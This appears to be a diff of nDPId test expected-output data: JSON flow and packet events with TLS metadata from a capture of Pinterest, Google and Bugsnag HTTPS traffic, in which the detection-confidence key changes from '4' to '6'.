{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -68,70 +68,70 @@ 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} -00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 